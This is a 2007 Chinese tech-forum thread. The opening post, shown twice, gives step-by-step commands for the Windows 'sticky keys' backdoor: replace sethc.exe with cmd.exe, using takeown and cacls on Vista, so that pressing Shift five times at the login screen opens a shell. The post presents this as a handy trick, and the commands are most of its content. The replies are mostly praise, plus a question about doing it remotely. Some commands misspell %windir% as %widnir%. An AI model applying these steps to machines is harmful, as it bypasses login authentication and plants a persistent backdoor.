1,508
社区成员
发帖
与我相关
我的任务
分享[系统安全]WINDOWS漏洞:粘置键
http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
...全文
请发表友善的回复…
发表回复
洪泉 2007-04-11
- 打赏
- 举报
LZ高人!
scz123 2007-04-11
- 打赏
- 举报
to HuYuguang:
无法打开,载入样式表单出错: 分析 XSLT 样式表单失败
无法打开,载入样式表单出错: 分析 XSLT 样式表单失败
HuYuguang 2007-04-11
- 打赏
- 举报
scz, 麻烦帮我看一下这个问题
http://community.csdn.net/Expert/topic/5458/5458484.xml?temp=.3398401
http://community.csdn.net/Expert/topic/5458/5458484.xml?temp=.3398401
cloudtarget 2007-04-11
- 打赏
- 举报
LZ高人!
miaoliujun 2007-04-11
- 打赏
- 举报
牛的
scz123 2007-04-09
- 打赏
- 举报
to: liaisewl(迷茫)
此类方法,可以在忘记密码,但又没有好的维护光盘的情况下使用。
不再本机操作的话:
利用系统漏洞,使用缓冲溢出,可以在不知道管理员密码的情况下,不在本机做手脚就可以达到这个效果。不过这类的黑客技术在下并不了解,顶多到网上下载一些工具来使用。
此类方法,可以在忘记密码,但又没有好的维护光盘的情况下使用。
不再本机操作的话:
利用系统漏洞,使用缓冲溢出,可以在不知道管理员密码的情况下,不在本机做手脚就可以达到这个效果。不过这类的黑客技术在下并不了解,顶多到网上下载一些工具来使用。
liaisewl 2007-04-06
- 打赏
- 举报
照这么说,必须在本机,先做好"手脚",有没有其它办法,可以不用操作本机,而达到这个效果呢,向楼主请教~
51Crack 2007-04-05
- 打赏
- 举报
已阅
liuyaoyou 2007-04-05
- 打赏
- 举报
厉害,收藏。
shadow841112 2007-04-05
- 打赏
- 举报
恩恩,不错
eeyyllehs 2007-04-05
- 打赏
- 举报
帮顶
dingjun643 2007-04-03
- 打赏
- 举报
顶,高人,怎么研究出来了?
MseRen 2007-04-03
- 打赏
- 举报
如果系统设置里取消了粘置键 功能.则shift按键按再多次也无用.但一般情况下,辅助功能默认都是开启的.呵呵.也确实是可以利用啊!
alex6520 2007-04-02
- 打赏
- 举报
厉害
接分了!
接分了!
china2685920 2007-03-30
- 打赏
- 举报
也对哦,谢谢楼主提醒
ljc007 2007-03-29
- 打赏
- 举报
收藏
接分
接分
feibenzu 2007-03-29
- 打赏
- 举报
帮顶了
hunhun02 2007-03-29
- 打赏
- 举报
学习了
Aceryt 2007-03-29
- 打赏
- 举报
又多个方法了。呵呵
jb99334 2007-03-29
- 打赏
- 举报
jf
加载更多回复(14)
